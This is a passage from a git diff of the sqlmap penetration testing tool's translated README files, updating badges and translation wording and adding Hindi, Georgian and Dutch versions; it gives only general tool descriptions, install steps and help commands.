* for contributing support for ClickHouse
|
||||
|
||||
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||
* for reporting a minor bug
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen.
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
||||
|
||||
|
||||
@@ -1,16 +1,16 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
|
||||
برنامه `sqlmap`، برنامهی منبع باز هست که برای تست نفوذ پذیزی دربرابر حملههای احتمالی `sql injection` (جلوگیری از لو رفتن پایگاه داده) جلو گیری میکند. این برنامه مجهز به مکانیزیم تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصص تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق `via out-of-band` درسیستم عامل را امکان پذیر میکند.
|
||||
برنامه `sqlmap`، یک برنامهی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر میکند.
|
||||
|
||||
|
||||
عکس
|
||||
تصویر محیط ابزار
|
||||
----
|
||||
|
||||
|
||||
@@ -23,7 +23,7 @@
|
||||
|
||||
<div dir=rtl>
|
||||
|
||||
برای دیدن کردن از [مجموعهی از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از ویکی دیدن کنید.
|
||||
برای نمایش [مجموعه ای از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از دانشنامه دیدن کنید.
|
||||
|
||||
|
||||
نصب
|
||||
@@ -32,11 +32,11 @@
|
||||
برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.
|
||||
|
||||
|
||||
طرز استفاده
|
||||
نحوه استفاده
|
||||
----
|
||||
|
||||
|
||||
برای گرفتن لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
|
||||
برای دریافت لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
|
||||
|
||||
|
||||
|
||||
@@ -53,7 +53,7 @@
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
برای گرفتن لیست تمامی ارگومانهای میتوانید از دستور زیر استفاده کنید:
|
||||
برای دریافت لیست تمامی ارگومانها میتوانید از دستور زیر استفاده کنید:
|
||||
|
||||
<div dir=ltr>
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
برای اطلاعات بیشتر برای اجرا از [اینجا](https://asciinema.org/a/46601) میتوانید استفاده کنید. برای گرفتن اطلاعات بیشتر توسعه میشود به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
|
||||
برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
|
||||
|
||||
|
||||
لینکها
|
||||
@@ -74,11 +74,11 @@
|
||||
|
||||
|
||||
* خانه: https://sqlmap.org
|
||||
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* تویتر: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* توییتر: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* عکسها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||
|
||||
|
||||
@@ -1,22 +1,24 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
sqlmap adalah alat bantu proyek sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
|
||||
|
||||
sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Alat ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
|
||||
Tangkapan Layar
|
||||
----
|
||||
|
||||
|
||||
|
||||
Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||
Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||
|
||||
Instalasi
|
||||
----
|
||||
|
||||
Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
@@ -25,26 +27,27 @@ sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi
|
||||
Penggunaan
|
||||
----
|
||||
|
||||
Untuk mendapatkan daftar opsi dasar gunakan:
|
||||
Untuk mendapatkan daftar opsi dasar gunakan perintah:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||
Untuk mendapatkan daftar opsi lanjutan gunakan perintah:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Tautan
|
||||
----
|
||||
|
||||
* Situs: https://sqlmap.org
|
||||
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
|
||||
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
50
doc/translations/README-in-HI.md
Normal file
50
doc/translations/README-in-HI.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
|
||||
|
||||
चित्रसंवाद
|
||||
----
|
||||
|
||||
|
||||
|
||||
आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
|
||||
|
||||
स्थापना
|
||||
----
|
||||
|
||||
आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
|
||||
|
||||
प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
|
||||
|
||||
उपयोग
|
||||
----
|
||||
|
||||
मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
|
||||
|
||||
लिंक
|
||||
----
|
||||
|
||||
* मुखपृष्ठ: https://sqlmap.org
|
||||
* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* ट्विटर: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
*
|
||||
@@ -1,6 +1,6 @@
|
||||
r# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
||||
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
||||
@@ -23,19 +23,19 @@ wikiに載っているいくつかの機能のデモをスクリーンショッ
|
||||
|
||||
sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
|
||||
|
||||
使用法
|
||||
使用方法
|
||||
----
|
||||
|
||||
基本的なオプションとスイッチの使用法をリストするには:
|
||||
基本的なオプションとスイッチの使用方法をリストで取得するには:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
全てのオプションとスイッチの使用法をリストするには:
|
||||
全てのオプションとスイッチの使用方法をリストで取得するには:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
|
||||
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
|
||||
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
|
||||
|
||||
リンク
|
||||
----
|
||||
|
||||
49
doc/translations/README-ka-GE.md
Normal file
49
doc/translations/README-ka-GE.md
Normal file
@@ -0,0 +1,49 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
|
||||
|
||||
ეკრანის ანაბეჭდები
|
||||
----
|
||||
|
||||
|
||||
|
||||
შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
|
||||
|
||||
ინსტალაცია
|
||||
----
|
||||
|
||||
თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.
|
||||
|
||||
ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
|
||||
|
||||
გამოყენება
|
||||
----
|
||||
|
||||
ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
ბმულები
|
||||
----
|
||||
|
||||
* საწყისი გვერდი: https://sqlmap.org
|
||||
* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다.
|
||||
|
||||
|
||||
50
doc/translations/README-nl-NL.md
Normal file
50
doc/translations/README-nl-NL.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
